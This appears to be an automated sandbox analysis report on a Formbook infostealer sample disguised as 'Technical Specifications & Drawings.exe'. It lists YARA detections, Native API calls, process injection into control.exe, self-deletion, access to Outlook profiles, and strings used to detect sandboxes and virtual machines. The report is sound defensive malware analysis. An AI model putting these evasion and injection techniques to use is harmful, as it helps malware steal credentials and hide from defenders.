          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_00E7CD04
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_00E7F0D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_00E7F077
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028E0C10
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028E0C40
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028E40D1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AF900
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018720A8
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018728EC
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861002
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187E824
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB090
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAB40
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186DBD2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018603DA
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DABD8
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01872B28
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DEBB0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018722AE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185FA2B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A0D20
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018725DD
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01872D07
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BD5E0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01871D55
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2581
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B841F
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186D466
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187DFCE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01871FF1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C6E30
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01872EF7
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186D616
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: String function: 017AB150 appears 133 times
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E96D0 NtCreateKey,
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263993924.00000000029B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000000.238895450.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.276069305.00000000070C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.275768947.0000000006F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000003.261218393.0000000001562000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000003.263343456.0000000001702000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exeBinary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Technical Specifications & Drawings.exeVirustotal: Detection: 32%
          Source: Technical Specifications & Drawings.exeReversingLabs: Detection: 21%
          Source: Technical Specifications & Drawings.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe "C:\Users\user\Desktop\Technical Specifications & Drawings.exe"
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
          Source: C:\Windows\SysWOW64\control.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Technical Specifications & Drawings.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile created: C:\Users\user\AppData\Local\Temp\207G7-97PJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@14/6
          Source: Technical Specifications & Drawings.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Technical Specifications & Drawings.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Technical Specifications & Drawings.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.cs.Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.cs.Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028EEFEA pushad ; retf
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028EF78A pushad ; iretd
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017FD0D1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.780783068719605

          Hooking and other Techniques for Hiding and Protection

          barindex
          Deletes itself after installation
          Source: C:\Windows\SysWOW64\control.exeFile deleted: c:\users\user\desktop\technical specifications & drawings.exeJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 6116Thread sleep time: -45877s >= -30000s
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 3116Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1972Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01875BA5 rdtsc
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeAPI coverage: 4.0 %
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread delayed: delay time: 45877
